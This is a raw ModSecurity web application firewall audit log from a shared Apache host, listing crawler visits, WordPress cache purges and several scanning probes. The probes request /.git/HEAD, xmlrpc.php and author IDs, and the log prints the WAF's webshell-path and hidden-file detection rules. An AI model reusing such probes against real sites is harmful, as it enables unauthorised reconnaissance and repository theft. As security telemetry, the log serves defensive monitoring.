Stopwatch: 1751241915861051 967649 (- - -) Stopwatch2: 1751241915861051 967649; combined=2643, p1=90, p2=2383, p3=0, p4=0, p5=170, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --4415ca34-Z-- --05311b6d-A-- [30/Jun/2025:05:35:18.067174 +0530] aGHUvgEk2LMjxRk5hI7aXgAAABg 20.171.207.232 32774 192.168.74.40 443 --05311b6d-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-agra/js/js/Rajasthan-Travel-Guides/https/Car-Rentals-Bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --05311b6d-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241918052638 14782 (- - -) Stopwatch2: 1751241918052638 14782; combined=2696, p1=147, p2=2432, p3=0, p4=0, p5=117, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --05311b6d-Z-- --4eb3a312-A-- [30/Jun/2025:05:35:18.324566 +0530] aGHUvcRfT_cQNmUWMD9FgQAAAAk 103.185.74.40 39334 192.168.74.40 443 --4eb3a312-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4eb3a312-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4eb3a312-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241917280116 1044839 (- - -) Stopwatch2: 1751241917280116 1044839; combined=2349, p1=85, p2=2098, p3=0, p4=0, p5=166, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4eb3a312-Z-- --c6c63158-A-- [30/Jun/2025:05:35:18.390838 +0530] aGHUu2LQz8G8bJi2amZlzAAAABA 13.201.27.234 59908 192.168.74.40 443 --c6c63158-B-- GET //?author=2 HTTP/1.1 Host: siaretech.in Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 --c6c63158-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751244220178361 18325 (- - -) Stopwatch2: 1751244220178361 18325; combined=4118, p1=175, p2=3768, p3=0, p4=0, p5=174, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3a1c7072-Z-- --10924e6d-A-- [30/Jun/2025:06:13:43.376306 +0530] aGHdvlGmupimtBqW6fmcPwAAAAI 103.185.74.40 61391 192.168.74.40 443 --10924e6d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --10924e6d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --10924e6d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751244222060147 1316567 (- - -) Stopwatch2: 1751244222060147 1316567; combined=2145, p1=101, p2=1894, p3=0, p4=0, p5=150, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --10924e6d-Z-- --d4d6a81d-A-- [30/Jun/2025:06:13:44.822718 +0530] aGHdv8bMdj5dXy1XkdBt7gAAAAo 103.185.74.40 42490 192.168.74.40 443 --d4d6a81d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --d4d6a81d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d4d6a81d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751244223586997 1236053 (- - -) Stopwatch2: 1751244223586997 1236053; combined=3197, p1=105, p2=2919, p3=0, p4=0, p5=173, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d4d6a81d-Z-- --e23f143f-A-- [30/Jun/2025:06:13:45.103698 +0530] aGHdwbxxHXT09PQJe3eFpQAAAAk 20.171.207.114 37700 192.168.74.40 443 --e23f143f-B-- GET /returns_refunds.php/js/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/images/js/images/images/admin@oz/sweetalert-master/dist/js/log-in.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=ovbt40d978660c645edhordhd5 host: ozautomotives.com.au --e23f143f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247821544013 14644 (- - -) Stopwatch2: 1751247821544013 14644; combined=3176, p1=154, p2=2871, p3=0, p4=0, p5=151, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --56e07733-Z-- --761ab10d-A-- [30/Jun/2025:07:13:42.359555 +0530] aGHrzXEhfJGl7tq6UcD1qgAAABM 103.185.74.40 11555 192.168.74.40 443 --761ab10d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --761ab10d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --761ab10d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247821152094 1208120 (- - -) Stopwatch2: 1751247821152094 1208120; combined=2070, p1=111, p2=1805, p3=0, p4=0, p5=154, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --761ab10d-Z-- --baa0c62c-A-- [30/Jun/2025:07:13:42.833117 +0530] aGHrzuDTWl20oNoHKoYiaAAAAAI 20.171.207.232 58796 192.168.74.40 443 --baa0c62c-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/aainag/aainag/Madhya_Pradesh-Destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --baa0c62c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --baa0c62c-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247823994230 14297 (- - -) Stopwatch2: 1751247823994230 14297; combined=2710, p1=123, p2=2446, p3=0, p4=0, p5=141, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --775c8d0a-Z-- --1a0dd34e-A-- [30/Jun/2025:07:13:44.149767 +0530] aGHrzj6M_Zn4JX7GEjug-gAAABw 103.185.74.40 34422 192.168.74.40 443 --1a0dd34e-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --1a0dd34e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1a0dd34e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247822570412 1579679 (- - -) Stopwatch2: 1751247822570412 1579679; combined=2893, p1=107, p2=2628, p3=0, p4=0, p5=157, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1a0dd34e-Z-- --ebbeed0b-A-- [30/Jun/2025:07:13:45.215555 +0530] aGHr0eDTWl20oNoHKoYiagAAAAI 20.171.207.232 58796 192.168.74.40 443 --ebbeed0b-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/https/Rajasthan-Travel-Guides/aainag/Madhya_Pradesh-Destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --ebbeed0b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ebbeed0b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247924523705 15006 (- - -) Stopwatch2: 1751247924523705 15006; combined=2661, p1=126, p2=2403, p3=0, p4=0, p5=131, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --edafdc56-Z-- --1293465a-A-- [30/Jun/2025:07:15:26.206916 +0530] aGHsMz6M_Zn4JX7GEjuhDgAAABw 103.185.74.40 10182 192.168.74.40 443 --1293465a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --1293465a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1293465a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247923906976 2300416 (- - -) Stopwatch2: 1751247923906976 2300416; combined=2567, p1=102, p2=2285, p3=0, p4=0, p5=179, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --1293465a-Z-- --16d42829-A-- [30/Jun/2025:07:15:28.081304 +0530] aGHsNu5r2WcCfMQAvuMKBAAAABY 103.185.74.40 30448 192.168.74.40 443 --16d42829-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --16d42829-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --16d42829-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247926420452 1661315 (- - -) Stopwatch2: 1751247926420452 1661315; combined=3134, p1=105, p2=2852, p3=0, p4=0, p5=177, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --16d42829-Z-- --b659cd31-A-- [30/Jun/2025:07:15:28.113823 +0530] aGHsOHn0CqjRt5BZpUZ_tgAAAA8 20.171.207.232 53526 192.168.74.40 443 --b659cd31-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/images/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b659cd31-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247930529503 17165 (- - -) Stopwatch2: 1751247930529503 17165; combined=3538, p1=166, p2=3214, p3=0, p4=0, p5=158, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --22dc5303-Z-- --f84f8f41-A-- [30/Jun/2025:07:15:32.480281 +0530] aGHsO5xe9YOH78sdvk4JTgAAABk 103.185.74.40 41270 192.168.74.40 443 --f84f8f41-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --f84f8f41-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f84f8f41-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247931513272 967452 (- - -) Stopwatch2: 1751247931513272 967452; combined=2775, p1=89, p2=2553, p3=0, p4=0, p5=133, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f84f8f41-Z-- --4203652d-A-- [30/Jun/2025:07:15:32.508878 +0530] aGHsPFbgXu3oqaK6XUC5fgAAABc 103.225.244.80 1048 192.168.74.40 443 --4203652d-B-- GET /xmlrpc.php HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Host: www.bangalorenightplans.com --4203652d-F-- HTTP/1.1 404 Not Found -- Action: Intercepted (phase 2) Stopwatch: 1751247932657408 5454 (- - -) Stopwatch2: 1751247932657408 5454; combined=3205, p1=90, p2=2670, p3=0, p4=0, p5=445, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --398e0040-Z-- --2e894124-A-- [30/Jun/2025:07:15:33.654885 +0530] aGHsPJrsHxWOLG_O_eqN4wAAAAE 103.185.74.40 9386 192.168.74.40 443 --2e894124-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --2e894124-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2e894124-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247932694988 960649 (- - -) Stopwatch2: 1751247932694988 960649; combined=2868, p1=144, p2=2263, p3=0, p4=0, p5=460, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --2e894124-Z-- --cae4a71d-A-- [30/Jun/2025:07:15:33.940183 +0530] aGHsPUlPz7zSC91KZ5PrsgAAACw 18.221.19.190 38060 192.168.74.40 443 --cae4a71d-B-- GET /2024/oiwi-tv/wp-content/uploads/2024/05/Vector-12.png HTTP/1.1 Host: wpcodex.xyz Connection: keep-alive Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; ClaudeBot/1.0; +claudebot@anthropic.com) Accept: image/webp,image/apng,image/*,*/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f9174161-Z-- --bef0b849-A-- [30/Jun/2025:07:16:43.835196 +0530] aGHsgwR4PwKt6_LFNjBRmQAAAAE 43.166.7.113 58112 192.168.74.40 80 --bef0b849-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --bef0b849-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --bef0b849-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751248003829088 6204 (- - -) Stopwatch2: 1751248003829088 6204; combined=3538, p1=90, p2=3244, p3=77, p4=3, p5=124, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bef0b849-Z-- --f97b086f-A-- [30/Jun/2025:07:16:43.910304 +0530] aGHsgwi6qje7lrED5arbcwAAAAQ 20.171.207.232 57588 192.168.74.40 443 --f97b086f-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/https/js/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f97b086f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f97b086f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/https/js/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3b13d772-Z-- --babf4a3d-A-- [30/Jun/2025:07:46:33.188184 +0530] aGHzgId4HZ3iHNTrp1ssYAAAADo 198.55.98.76 46840 192.168.74.40 443 --babf4a3d-B-- GET /.git/HEAD HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/4.8 [en] (Windows NT 5.1; U) Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close --babf4a3d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --babf4a3d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. 
